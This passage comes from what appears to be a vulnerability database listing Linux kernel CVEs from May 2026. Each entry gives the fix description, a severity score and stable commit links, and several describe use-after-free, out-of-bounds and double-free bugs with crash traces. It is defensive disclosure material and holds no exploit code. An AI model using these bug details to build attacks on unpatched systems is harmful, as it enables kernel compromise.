https://git.kernel.org/stable/c/81248b1eb3c5954cc1fc7b33b7c03e34d20cb8c8 https://git.kernel.org/stable/c/899ef00963ce76f9fc421a7d02335fe4ead6389b https://git.kernel.org/stable/c/9ff599a9be784a808c36765086e3db2144aa3b66 https://git.kernel.org/stable/c/ad22d24be635c6beab6a1fdd3f8b1f3c478d15da |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/rds: Clear reconnect pending bit When canceling the reconnect worker, care must be taken to reset the reconnect-pending bit. If the reconnect worker has not yet been scheduled before it is canceled, the reconnect-pending bit will stay on forever. | 2026-05-06 | 7.5 | CVE-2026-43230 | https://git.kernel.org/stable/c/3cf001aff71b1db1b4732a5381b012a114720664 https://git.kernel.org/stable/c/60b347333ec259ac7352f62cbbc365b04c065ff8 https://git.kernel.org/stable/c/597c46a42930c963f448720aaf5001dd4ed98af4 https://git.kernel.org/stable/c/391200c274e90c34071b909ba12e3390b81b767f https://git.kernel.org/stable/c/ba2e3472022f44baddf000621fed150d7a599ea3 https://git.kernel.org/stable/c/14eae5564053ac3973b9369dc674638f22f4765e https://git.kernel.org/stable/c/bcf034fa5f66b6a3e787f765a917934a2045cf7a https://git.kernel.org/stable/c/b89fc7c2523b2b0750d91840f4e52521270d70ed |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/atmel-hlcdc: fix use-after-free of drm_crtc_commit after release The atmel_hlcdc_plane_atomic_duplicate_state() callback was copying the atmel_hlcdc_plane state structure without properly duplicating the drm_plane_state. In particular, state->commit remained set to the old state commit, which can lead to a use-after-free in the next drm_atomic_commit() call. Fix this by calling __drm_atomic_helper_duplicate_plane_state(), which correctly clones the base drm_plane_state (including the ->commit pointer). It has been seen when closing and re-opening the device node while another DRM client (e.g. fbdev) is still attached: ============================================================================= BUG kmalloc-64 (Not tainted): Poison overwritten ----------------------------------------------------------------------------- 0xc611b344-0xc611b344 @offset=836. First byte 0x6a instead of 0x6b FIX kmalloc-64: Restoring Poison 0xc611b344-0xc611b344=0x6b Allocated in drm_atomic_helper_setup_commit+0x1e8/0x7bc age=178 cpu=0 pid=29 drm_atomic_helper_setup_commit+0x1e8/0x7bc drm_atomic_helper_commit+0x3c/0x15c drm_atomic_commit+0xc0/0xf4 drm_framebuffer_remove+0x4cc/0x5a8 drm_mode_rmfb_work_fn+0x6c/0x80 process_one_work+0x12c/0x2cc worker_thread+0x2a8/0x400 kthread+0xc0/0xdc ret_from_fork+0x14/0x28 Freed in drm_atomic_helper_commit_hw_done+0x100/0x150 age=8 cpu=0 pid=169 drm_atomic_helper_commit_hw_done+0x100/0x150 drm_atomic_helper_commit_tail+0x64/0x8c commit_tail+0x168/0x18c drm_atomic_helper_commit+0x138/0x15c drm_atomic_commit+0xc0/0xf4 drm_atomic_helper_set_config+0x84/0xb8 drm_mode_setcrtc+0x32c/0x810 drm_ioctl+0x20c/0x488 sys_ioctl+0x14c/0xc20 ret_fast_syscall+0x0/0x54 Slab 0xef8bc360 objects=21 used=16 fp=0xc611b7c0 flags=0x200(workingset|zone=0) Object 0xc611b340 @offset=832 fp=0xc611b7c0 | 2026-05-06 | 7.8 | CVE-2026-43236 | https://git.kernel.org/stable/c/fd4a4d0711f48a99b25bcd45e00eef8339eff82d https://git.kernel.org/stable/c/6404898af86d986db1dbbe06177c143e40652e49 https://git.kernel.org/stable/c/796e77c14c4c1e2cd36473760fb6cc66c695eb47 https://git.kernel.org/stable/c/ac2d898da5095d46bd1ff8585fdd753d58ad91e7 https://git.kernel.org/stable/c/a205740a7231e967ac77cb731171642901c327af https://git.kernel.org/stable/c/7b4d0fab3ff2c00c6d34e1952c9df5129a826aee https://git.kernel.org/stable/c/549c6db503dbb85dbff4840830971853feac6625 https://git.kernel.org/stable/c/bc847787233277a337788568e90a6ee1557595eb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Refactor amdgpu_gem_va_ioctl for Handling Last Fence Update and Timeline Management v4 This commit simplifies the amdgpu_gem_va_ioctl function, key updates include: - Moved the logic for managing the last update fence directly into amdgpu_gem_va_update_vm. - Introduced checks for the timeline point to enable conditional replacement or addition of fences. v2: Addressed review comments from Christian. v3: Updated comments (Christian). v4: The previous version selected the fence too early and did not manage its reference correctly, which could lead to stale or freed fences being used. This resulted in refcount underflows and could crash when updating GPU timelines. The fence is now chosen only after the VA mapping work is completed, and its reference is taken safely. After exporting it to the VM timeline syncobj, the driver always drops its local fence reference, ensuring balanced refcounting and avoiding use-after-free on dma_fence. Crash signature: [ 205.828135] refcount_t: underflow; use-after-free. [ 205.832963] WARNING: CPU: 30 PID: 7274 at lib/refcount.c:28 refcount_warn_saturate+0xbe/0x110 ... [ 206.074014] Call Trace: [ 206.076488] <TASK> [ 206.078608] amdgpu_gem_va_ioctl+0x6ea/0x740 [amdgpu] [ 206.084040] ? __pfx_amdgpu_gem_va_ioctl+0x10/0x10 [amdgpu] [ 206.089994] drm_ioctl_kernel+0x86/0xe0 [drm] [ 206.094415] drm_ioctl+0x26e/0x520 [drm] [ 206.098424] ? __pfx_amdgpu_gem_va_ioctl+0x10/0x10 [amdgpu] [ 206.104402] amdgpu_drm_ioctl+0x4b/0x80 [amdgpu] [ 206.109387] __x64_sys_ioctl+0x96/0xe0 [ 206.113156] do_syscall_64+0x66/0x2d0 ... [ 206.553351] BUG: unable to handle page fault for address: ffffffffc0dfde90 ... [ 206.553378] RIP: 0010:dma_fence_signal_timestamp_locked+0x39/0xe0 ... [ 206.553405] Call Trace: [ 206.553409] <IRQ> [ 206.553415] ? __pfx_drm_sched_fence_free_rcu+0x10/0x10 [gpu_sched] [ 206.553424] dma_fence_signal+0x30/0x60 [ 206.553427] drm_sched_job_done.isra.0+0x123/0x150 [gpu_sched] [ 206.553434] dma_fence_signal_timestamp_locked+0x6e/0xe0 [ 206.553437] dma_fence_signal+0x30/0x60 [ 206.553441] amdgpu_fence_process+0xd8/0x150 [amdgpu] [ 206.553854] sdma_v4_0_process_trap_irq+0x97/0xb0 [amdgpu] [ 206.554353] edac_mce_amd(E) ee1004(E) [ 206.554270] amdgpu_irq_dispatch+0x150/0x230 [amdgpu] [ 206.554702] amdgpu_ih_process+0x6a/0x180 [amdgpu] [ 206.555101] amdgpu_irq_handler+0x23/0x60 [amdgpu] [ 206.555500] __handle_irq_event_percpu+0x4a/0x1c0 [ 206.555506] handle_irq_event+0x38/0x80 [ 206.555509] handle_edge_irq+0x92/0x1e0 [ 206.555513] __common_interrupt+0x3e/0xb0 [ 206.555519] common_interrupt+0x80/0xa0 [ 206.555525] </IRQ> [ 206.555527] <TASK> ... [ 206.555650] RIP: 0010:dma_fence_signal_timestamp_locked+0x39/0xe0 ... [ 206.555667] Kernel panic - not syncing: Fatal exception in interrupt | 2026-05-06 | 7.8 | CVE-2026-43237 | https://git.kernel.org/stable/c/e9e477d3197f7d8955a042c0d7f53f78f13218ba https://git.kernel.org/stable/c/0399b8416ecf64ef86ad23401fe23eabdb07831a https://git.kernel.org/stable/c/bd8150a1b3370a9f7761c5814202a3fe5a79f44f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs: ->d_compare() must not block ... so don't use __getname() there. Switch it (and ntfs_d_hash(), while we are at it) to kmalloc(PATH_MAX, GFP_NOWAIT). Yes, ntfs_d_hash() almost certainly can do with smaller allocations, but let ntfs folks deal with that - keep the allocation size as-is for now. Stop abusing names_cachep in ntfs, period - various uses of that thing in there have nothing to do with pathnames; just use k[mz]alloc() and be done with that. For now let's keep sizes as-in, but AFAICS none of the users actually want PATH_MAX. | 2026-05-06 | 7.5 | CVE-2026-43245 | https://git.kernel.org/stable/c/142c444a395f4d26055c8a4473e228bb86283f1e https://git.kernel.org/stable/c/fb4b1f969ba01fa1d4088467a02fc1e5f0806710 https://git.kernel.org/stable/c/ca2a04e84af79596e5cd9cfe697d5122ec39c8ce |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vhost: move vdpa group bound check to vhost_vdpa Remove duplication by consolidating these here. This reduces the posibility of a parent driver missing them. While we're at it, fix a bug in vdpa_sim where a valid ASID can be assigned to a group equal to ngroups, causing an out of bound write. | 2026-05-06 | 7.8 | CVE-2026-43248 | https://git.kernel.org/stable/c/ddb57354634b6ba851b79da45f1de42c646f27d0 https://git.kernel.org/stable/c/7441d35d14d9a3d66d925d90cb73c75394e6d454 https://git.kernel.org/stable/c/406db68f9cb976a8ddfafd631197264f2307e9c9 https://git.kernel.org/stable/c/cd025c1e876b4e262e71398236a1550486a73ede |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/amd: move wait_on_sem() out of spinlock With iommu.strict=1, the existing completion wait path can cause soft lockups under stressed environment, as wait_on_sem() busy-waits under the spinlock with interrupts disabled. Move the completion wait in iommu_completion_wait() out of the spinlock. wait_on_sem() only polls the hardware-updated cmd_sem and does not require iommu->lock, so holding the lock during the busy wait unnecessarily increases contention and extends the time with interrupts disabled. | 2026-05-06 | 7.5 | CVE-2026-43253 | https://git.kernel.org/stable/c/f2f65b28d802a667119147444ec2ae33eebf9a58 https://git.kernel.org/stable/c/715c263119fd1b918a9fcbd8a36ea5b604a46324 https://git.kernel.org/stable/c/e15768e68820142077bbca402d8e902f64ade1b0 https://git.kernel.org/stable/c/496269d12072ecb219826485bdbec70c92a8eef5 https://git.kernel.org/stable/c/d2a0cac10597068567d336e85fa3cbdbe8ca62bf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ovpn: tcp - fix packet extraction from stream When processing TCP stream data in ovpn_tcp_recv, we receive large cloned skbs from __strp_rcv that may contain multiple coalesced packets. The current implementation has two bugs: 1. Header offset overflow: Using pskb_pull with large offsets on coalesced skbs causes skb->data - skb->head to exceed the u16 storage of skb->network_header. This causes skb_reset_network_header to fail on the inner decapsulated packet, resulting in packet drops. 2. Unaligned protocol headers: Extracting packets from arbitrary positions within the coalesced TCP stream provides no alignment guarantees for the packet data causing performance penalties on architectures without efficient unaligned access. Additionally, openvpn's 2-byte length prefix on TCP packets causes the subsequent 4-byte opcode and packet ID fields to be inherently misaligned. Fix both issues by allocating a new skb for each openvpn packet and using skb_copy_bits to extract only the packet content into the new buffer, skipping the 2-byte length prefix. Also, check the length before invoking the function that performs the allocation to avoid creating an invalid skb. If the packet has to be forwarded to userspace the 2-byte prefix can be pushed to the head safely, without misalignment. As a side effect, this approach also avoids the expensive linearization that pskb_pull triggers on cloned skbs with page fragments. In testing, this resulted in TCP throughput improvements of up to 74%. | 2026-05-06 | 7.5 | CVE-2026-43254 | https://git.kernel.org/stable/c/0315bec883c67fa1413c61e504a28dc5bd02eb37 https://git.kernel.org/stable/c/7dba6cd7fb168d7615194a631c9c100c1c224131 https://git.kernel.org/stable/c/d4f687fbbce45b5e88438e89b5e26c0c15847992 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: qcom: camss: vfe: Fix out-of-bounds access in vfe_isr_reg_update() vfe_isr() iterates using MSM_VFE_IMAGE_MASTERS_NUM(7) as the loop bound and passes the index to vfe_isr_reg_update(). However, vfe->line[] array is defined with VFE_LINE_NUM_MAX(4): struct vfe_line line[VFE_LINE_NUM_MAX]; When index is 4, 5, 6, the access to vfe->line[line_id] exceeds the array bounds and resulting in out-of-bounds memory access. Fix this by using separate loops for output lines and write masters. | 2026-05-06 | 7.8 | CVE-2026-43256 | https://git.kernel.org/stable/c/e6cbf765686fb6c1d8f2530b3daf6c66efc92f5d https://git.kernel.org/stable/c/0c074e80921fd18984b75836730d76c768c84f65 https://git.kernel.org/stable/c/1b103307df6d461a0731be25aca69ad0335b0933 https://git.kernel.org/stable/c/fade67c88870f497a13ed450ba01f7236c92dd9b https://git.kernel.org/stable/c/e7a38ecda2498e7ce998793ac2a46ca47317635d https://git.kernel.org/stable/c/d965919af524e68cb2ab1a685872050ad2ee933d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: alpha: fix user-space corruption during memory compaction Alpha systems can suffer sporadic user-space crashes and heap corruption when memory compaction is enabled. Symptoms include SIGSEGV, glibc allocator failures (e.g. "unaligned tcache chunk"), and compiler internal errors. The failures disappear when compaction is disabled or when using global TLB invalidation. The root cause is insufficient TLB shootdown during page migration. Alpha relies on ASN-based MM context rollover for instruction cache coherency, but this alone is not sufficient to prevent stale data or instruction translations from surviving migration. Fix this by introducing a migration-specific helper that combines: - MM context invalidation (ASN rollover), - immediate per-CPU TLB invalidation (TBI), - synchronous cross-CPU shootdown when required. The helper is used only by migration/compaction paths to avoid changing global TLB semantics. Additionally, update flush_tlb_other(), pte_clear(), to use READ_ONCE()/WRITE_ONCE() for correct SMP memory ordering. This fixes observed crashes on both UP and SMP Alpha systems. | 2026-05-06 | 7.8 | CVE-2026-43258 | https://git.kernel.org/stable/c/d4ca6ca2c6f5a1d19d9014c5b36d96637846b5d6 https://git.kernel.org/stable/c/03e42b5f7ad4c2c3db8bd384bab7990d5d53c90f https://git.kernel.org/stable/c/bab8d762a8dbb816b10011e13b87d1bca91e5f77 https://git.kernel.org/stable/c/dd5712f3379cfe760267cdd28ff957d9ab4e51c7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: chips-media: wave5: Fix Null reference while testing fluster When multi instances are created/destroyed, many interrupts happens and structures for decoder are removed. "struct vpu_instance" this structure is shared for all flow in the decoder, so if the structure is not protected by lock, Null dereference could happens sometimes. IRQ Handler was spilt to two phases and Lock was added as well. | 2026-05-06 | 7.8 | CVE-2026-43263 | https://git.kernel.org/stable/c/ea316b784fe6a61b29131c98cddb24e651b1dcbc https://git.kernel.org/stable/c/d12bcf183ec7da4305d848068d15f18044eaf62a https://git.kernel.org/stable/c/e66ff2b08e4ee1c4d3b84f24818e5bcc178cc3a4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm: clear cloned request bio pointer when last clone bio completes Stale rq->bio values have been observed to cause double-initialization of cloned bios in request-based device-mapper targets, leading to use-after-free and double-free scenarios. One such case occurs when using dm-multipath on top of a PCIe NVMe namespace, where cloned request bios are freed during blk_complete_request(), but rq->bio is left intact. Subsequent clone teardown then attempts to free the same bios again via blk_rq_unprep_clone(). The resulting double-free path looks like: nvme_pci_complete_batch() nvme_complete_batch() blk_mq_end_request_batch() blk_complete_request() // called on a DM clone request bio_endio() // first free of all clone bios ... rq->end_io() // end_clone_request() dm_complete_request(tio->orig) dm_softirq_done() dm_done() dm_end_request() blk_rq_unprep_clone() // second free of clone bios Fix this by clearing the clone request's bio pointer when the last cloned bio completes, ensuring that later teardown paths do not attempt to free already-released bios. | 2026-05-06 | 7.8 | CVE-2026-43278 | https://git.kernel.org/stable/c/8d9ddad561136f7e6a9346767bf97b4d79e38e67 https://git.kernel.org/stable/c/7daf279c674d515fb22a727a7bbc92aeb35c5442 https://git.kernel.org/stable/c/e2e738e8dfbbf83bd2bae0467ec4420cc52da42a https://git.kernel.org/stable/c/b1c1a2637ebd675aa2d71fee8c70da8791d73850 https://git.kernel.org/stable/c/83d72091804600ead96dc9e9f518ea56cb4942f6 https://git.kernel.org/stable/c/fb8a6c18fb9a6561f7a15b58b272442b77a242dd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Add sanity check for OOB writes at silencing At silencing the playback URB packets in the implicit fb mode before the actual playback, we blindly assume that the received packets fit with the buffer size. But when the setup in the capture stream differs from the playback stream (e.g. due to the USB core limitation of max packet size), such an inconsistency may lead to OOB writes to the buffer, resulting in a crash. For addressing it, add a sanity check of the transfer buffer size at prepare_silent_urb(), and stop the data copy if the received data overflows. Also, report back the transfer error properly from there, too. Note that this doesn't fix the root cause of the playback error itself, but this merely covers the kernel Oops. | 2026-05-06 | 7.8 | CVE-2026-43279 | https://git.kernel.org/stable/c/fa01973bb79d70c4736b6a4b2de99fbb2cbc8d1f https://git.kernel.org/stable/c/780dc57794a217b49994fa1d0b42465fb10a00aa https://git.kernel.org/stable/c/8995fc0e00b3fee9bf7ecb3d836b635b730c1049 https://git.kernel.org/stable/c/fc9e5af60dc199051dc202ae78e1fe76a9977a5e https://git.kernel.org/stable/c/6af16f1b8649df4c00d6ced924bdd8b72c885b6a https://git.kernel.org/stable/c/ccaf9296763be4f76b59e2cac377006016c34435 https://git.kernel.org/stable/c/fba2105a157fffcf19825e4eea498346738c9948 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe: Add bounds check on pat_index to prevent OOB kernel read in madvise When user provides a bogus pat_index value through the madvise IOCTL, the xe_pat_index_get_coh_mode() function performs an array access without validating bounds. This allows a malicious user to trigger an out-of-bounds kernel read from the xe->pat.table array. The vulnerability exists because the validation in madvise_args_are_sane() directly calls xe_pat_index_get_coh_mode(xe, args->pat_index.val) without first checking if pat_index is within [0, xe->pat.n_entries). Although xe_pat_index_get_coh_mode() has a WARN_ON to catch this in debug builds, it still performs the unsafe array access in production kernels. v2(Matthew Auld) - Using array_index_nospec() to mitigate spectre attacks when the value is used v3(Matthew Auld) - Put the declarations at the start of the block (cherry picked from commit 944a3329b05510d55c69c2ef455136e2fc02de29) | 2026-05-06 | 7.1 | CVE-2026-43280 | https://git.kernel.org/stable/c/ffba51100ff61792fefbae11ca38ac1987a818dd https://git.kernel.org/stable/c/79f52655567a6471ff3d0d6325ede91bb14461f4 https://git.kernel.org/stable/c/fbbe32618e97eff81577a01eb7d9adcd64a216d7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: uvcvideo: Return queued buffers on start_streaming() failure Return buffers if streaming fails to start due to uvc_pm_get() error. This bug may be responsible for a warning I got running while :; do yavta -c3 /dev/video0; done on an xHCI controller which failed under this workload. I had no luck reproducing this warning again to confirm. xhci_hcd 0000:09:00.0: HC died; cleaning up usb 13-2: USB disconnect, device number 2 WARNING: CPU: 2 PID: 29386 at drivers/media/common/videobuf2/videobuf2-core.c:1803 vb2_start_streaming+0xac/0x120 | 2026-05-08 | 7.8 | CVE-2026-43290 | https://git.kernel.org/stable/c/69c32df23bed6001864779b965fa009bcd9a26de https://git.kernel.org/stable/c/a5c01f15809d1d2c319d8bfb11d071df11ab731c https://git.kernel.org/stable/c/4cf3b6fd54ebb1ebc977bdc47fb6cfcf9a471a22 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: octeontx2-af: Workaround SQM/PSE stalls by disabling sticky NIX SQ manager sticky mode is known to cause stalls when multiple SQs share an SMQ and transmit concurrently. Additionally, PSE may deadlock on transitions between sticky and non-sticky transmissions. There is also a credit drop issue observed when certain condition clocks are gated. work around these hardware errata by: - Disabling SQM sticky operation: - Clear TM6 (bit 15) - Clear TM11 (bit 14) - Disabling sticky → non-sticky transition path that can deadlock PSE: - Clear TM5 (bit 23) - Preventing credit drops by keeping the control-flow clock enabled: - Set TM9 (bit 21) These changes are applied via NIX_AF_SQM_DBG_CTL_STATUS. With this configuration the SQM/PSE maintain forward progress under load without credit loss, at the cost of disabling sticky optimizations. | 2026-05-08 | 7.5 | CVE-2026-43296 | https://git.kernel.org/stable/c/9a3fd301329474f449e75f86d8a4f6b9c603fd6c https://git.kernel.org/stable/c/d0b3c8a80336029d9356f429151eb27922d80a3c https://git.kernel.org/stable/c/36cc5a5e0178d5fb79e04173b8aa623b0108819a https://git.kernel.org/stable/c/d9b549b6951ba178ec14339a031cae65f4e43fe1 https://git.kernel.org/stable/c/cec2ceb35ce7bc874c43812bb39200d6cf691b87 https://git.kernel.org/stable/c/8052d0587fb14b85539c3a14a226586c0c3d6b4c https://git.kernel.org/stable/c/b7eba260a34e854e2487b8363c11976f082df00d https://git.kernel.org/stable/c/70e9a5760abfb6338d63994d4de6b0778ec795d6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/page_alloc: clear page->private in free_pages_prepare() Several subsystems (slub, shmem, ttm, etc.) use page->private but don't clear it before freeing pages. When these pages are later allocated as high-order pages and split via split_page(), tail pages retain stale page->private values. This causes a use-after-free in the swap subsystem. The swap code uses page->private to track swap count continuations, assuming freshly allocated pages have page->private == 0. When stale values are present, swap_count_continued() incorrectly assumes the continuation list is valid and iterates over uninitialized page->lru containing LIST_POISON values, causing a crash: KASAN: maybe wild-memory-access in range [0xdead000000000100-0xdead000000000107] RIP: 0010:__do_sys_swapoff+0x1151/0x1860 Fix this by clearing page->private in free_pages_prepare(), ensuring all freed pages have clean state regardless of previous use. | 2026-05-08 | 7.8 | CVE-2026-43303 | https://git.kernel.org/stable/c/23b82b7a26182ad840ae67d390d7ec9771e8c00f https://git.kernel.org/stable/c/d757c793853ec5483eb41ec2942c300b8fa720fb https://git.kernel.org/stable/c/ac1ea219590c09572ed5992dc233bbf7bb70fef9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: accel: adxl380: Avoid reading more entries than present in FIFO The interrupt handler reads FIFO entries in batches of N samples, where N is the number of scan elements that have been enabled. However, the sensor fills the FIFO one sample at a time, even when more than one channel is enabled. Therefore,the number of entries reported by the FIFO status registers may not be a multiple of N; if this number is not a multiple, the number of entries read from the FIFO may exceed the number of entries actually present. To fix the above issue, round down the number of FIFO entries read from the status registers so that it is always a multiple of N. | 2026-05-08 | 7.8 | CVE-2026-43307 | https://git.kernel.org/stable/c/a40f316085985f916ba1599fc303fdbc6a078e86 https://git.kernel.org/stable/c/a8e88edfd69df7b63c882aa53e61e7c078806ad7 https://git.kernel.org/stable/c/f42ddb2945ae4ce2b6f1c2e7aae9f14455a734d3 https://git.kernel.org/stable/c/c1b14015224cfcccd5356333763f2f4f401bd810 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Properly mark live registers for indirect jumps For a `gotox rX` instruction the rX register should be marked as used in the compute_insn_live_regs() function. Fix this. | 2026-05-08 | 7.8 | CVE-2026-43321 | https://git.kernel.org/stable/c/7beae54111c34ca63357ef120e115889b915beb5 https://git.kernel.org/stable/c/d1aab1ca576c90192ba961094d51b0be6355a4d6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: USB: dummy-hcd: Fix interrupt synchronization error This fixes an error in synchronization in the dummy-hcd driver. The error has a somewhat involved history. The synchronization mechanism was introduced by commit 7dbd8f4cabd9 ("USB: dummy-hcd: Fix erroneous synchronization change"), which added an emulated "interrupts enabled" flag together with code emulating synchronize_irq() (it waits until all current handler callbacks have returned). But the emulated interrupt-disable occurred too late, after the driver containing the handler callback routines had been told that it was unbound and no more callbacks would occur. Commit 4a5d797a9f9c ("usb: gadget: dummy_hcd: fix gpf in gadget_setup") tried to fix this by moving the synchronize_irq() emulation code from dummy_stop() to dummy_pullup(), which runs before the unbind callback. There still were races, though, because the emulated interrupt-disable still occurred too late. It couldn't be moved to dummy_pullup(), because that routine can be called for reasons other than an impending unbind. Therefore commits 7dc0c55e9f30 ("USB: UDC core: Add udc_async_callbacks gadget op") and 04145a03db9d ("USB: UDC: Implement udc_async_callbacks in dummy-hcd") added an API allowing the UDC core to tell dummy-hcd exactly when emulated interrupts and their callbacks should be disabled. That brings us to the current state of things, which is still wrong because the emulated synchronize_irq() occurs before the emulated interrupt-disable! That's no good, beause it means that more emulated interrupts can occur after the synchronize_irq() emulation has run, leading to the possibility that a callback handler may be running when the gadget driver is unbound. To fix this, we have to move the synchronize_irq() emulation code yet again, to the dummy_udc_async_callbacks() routine, which takes care of enabling and disabling emulated interrupt requests. The synchronization will now run immediately after emulated interrupts are disabled, which is where it belongs. | 2026-05-08 | 7.8 | CVE-2026-43324 | https://git.kernel.org/stable/c/d847f375b1bcea713143bc02720d13d2d01b012a https://git.kernel.org/stable/c/cbf7df5e5d27cd5bea92ee9a75a4b28dbcc718d4 https://git.kernel.org/stable/c/5aa776c8615bea3b1eaeec87b0788375800ead4f https://git.kernel.org/stable/c/94d4fab1dd9e64f45449bcc7d6a5acf796b13015 https://git.kernel.org/stable/c/5687a09776069bd915560021c9728ca528440128 https://git.kernel.org/stable/c/8bcd80219d8e10e660bf29b20e41bb8beb4e4cb7 https://git.kernel.org/stable/c/2ca9e46f8f1f5a297eb0ac83f79d35d5b3a02541 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: flowtable: strictly check for maximum number of actions The maximum number of flowtable hardware offload actions in IPv6 is: * ethernet mangling (4 payload actions, 2 for each ethernet address) * SNAT (4 payload actions) * DNAT (4 payload actions) * Double VLAN (4 vlan actions, 2 for popping vlan, and 2 for pushing) for QinQ. * Redirect (1 action) Which makes 17, while the maximum is 16. But act_ct supports for tunnels actions too. Note that payload action operates at 32-bit word level, so mangling an IPv6 address takes 4 payload actions. Update flow_action_entry_next() calls to check for the maximum number of supported actions. While at it, rise the maximum number of actions per flow from 16 to 24 so this works fine with IPv6 setups. | 2026-05-08 | 7.8 | CVE-2026-43329 | https://git.kernel.org/stable/c/ead66c77303f760f6c30be96e2e20d5a77cef614 https://git.kernel.org/stable/c/fe9018d3e94329f1951b00805a8640bc06f56ead https://git.kernel.org/stable/c/5382bb03e9c33b089d60788478b922a2dca284cc https://git.kernel.org/stable/c/57c78bd2e2dd08897acd35b2bf8bcef322e36f5e https://git.kernel.org/stable/c/504c9456699dcf4d15195ef34a0fa94a80bfc877 https://git.kernel.org/stable/c/879959a7a2be814dd57568655eafa3d8f4d0309e https://git.kernel.org/stable/c/76522fcdbc3a02b568f5d957f7e66fc194abb893 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: caam - fix overflow on long hmac keys When a key longer than block size is supplied, it is copied and then hashed into the real key. The memory allocated for the copy needs to be rounded to DMA cache alignment, as otherwise the hashed key may corrupt neighbouring memory. The copying is performed using kmemdup, however this leads to an overflow: reading more bytes (aligned_len - keylen) from the keylen source buffer. Fix this by replacing kmemdup with kmalloc, followed by memcpy. | 2026-05-08 | 7.8 | CVE-2026-43330 | https://git.kernel.org/stable/c/31022cfde5235c45fa765f0aabeff5f0652852f2 https://git.kernel.org/stable/c/c2fb4984fe09fc176fe4c12d5e3edf626df6511d https://git.kernel.org/stable/c/aa545df011338df13f0833fc1fabcb15c0521959 https://git.kernel.org/stable/c/cebc5ebd958346195b77f42d0cd5141b4e448fae https://git.kernel.org/stable/c/80688afb9c35b3934ce2d6be9973758915e2e0ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: thermal: core: Fix thermal zone device registration error path If thermal_zone_device_register_with_trips() fails after registering a thermal zone device, it needs to wait for the tz->removal completion like thermal_zone_device_unregister(), in case user space has managed to take a reference to the thermal zone device's kobject, in which case thermal_release() may not be called by the error path itself and tz may be freed prematurely. Add the missing wait_for_completion() call to the thermal zone device registration error path. | 2026-05-08 | 7.8 | CVE-2026-43332 | https://git.kernel.org/stable/c/9e796001af97a1f7368d5114b7a8533dd98d797a https://git.kernel.org/stable/c/604da9c04c218362e1c1457304ebeb9c199d537c https://git.kernel.org/stable/c/c4c7219e93319bba9ba0765dee597784c78f63c5 https://git.kernel.org/stable/c/4d390f0e507dfb16d58f83a58d78d1150dc8b9d7 https://git.kernel.org/stable/c/9e07e3b81807edd356e1f794cffa00a428eff443 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: lib/crypto: chacha: Zeroize permuted_state before it leaves scope Since the ChaCha permutation is invertible, the local variable 'permuted_state' is sufficient to compute the original 'state', and thus the key, even after the permutation has been done. While the kernel is quite inconsistent about zeroizing secrets on the stack (and some prominent userspace crypto libraries don't bother at all since it's not guaranteed to work anyway), the kernel does try to do it as a best practice, especially in cases involving the RNG. Thus, explicitly zeroize 'permuted_state' before it goes out of scope. | 2026-05-08 | 7.5 | CVE-2026-43336 | https://git.kernel.org/stable/c/e90ee961af515a484f091678ce58a4c3f7b73b02 https://git.kernel.org/stable/c/b416a4245f04a450c67a13e6d96056c37c5b33fe https://git.kernel.org/stable/c/bd62d9b44464a6c20a34a74068e7a784d0afa04a https://git.kernel.org/stable/c/066c760acead1fb743bae294dbd89f479ae43b9b https://git.kernel.org/stable/c/1d761e5a7340c46479fb2399598f331e4fe2c633 https://git.kernel.org/stable/c/1933249263c3a98df79992f61a566476e4163bcc https://git.kernel.org/stable/c/91999af43ca2125e3b2c18fcfc02912ada02efc3 https://git.kernel.org/stable/c/e5046823f8fa3677341b541a25af2fcb99a5b1e0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: prevent possible UaF in addrconf_permanent_addr() The mentioned helper try to warn the user about an exceptional condition, but the message is delivered too late, accessing the ipv6 after its possible deletion. Reorder the statement to avoid the possible UaF; while at it, place the warning outside the idev->lock as it needs no protection. | 2026-05-08 | 7.8 | CVE-2026-43339 | https://git.kernel.org/stable/c/eec49a33611f20336b357b3953df44f1a02049e8 https://git.kernel.org/stable/c/bacc7f31085c9820922f00bc7d79756ffa13123a https://git.kernel.org/stable/c/7bfafa1b0cd582983ebec6bb20f0a435528fe567 https://git.kernel.org/stable/c/7d9f2f4aabd116ca68fbdab5d8fb8dac74c2ea1e https://git.kernel.org/stable/c/25357b670afb5b517096da783abaa5cc4bf8359e https://git.kernel.org/stable/c/3cd4efb5df72843dfac892d0b3c7a4a8bd926b65 https://git.kernel.org/stable/c/2d88ed7fa000e19c2dc0fa31b3a849e3f5bca5c1 https://git.kernel.org/stable/c/fd63f185979b047fb22a0dfc6bd94d0cab6a6a70 |
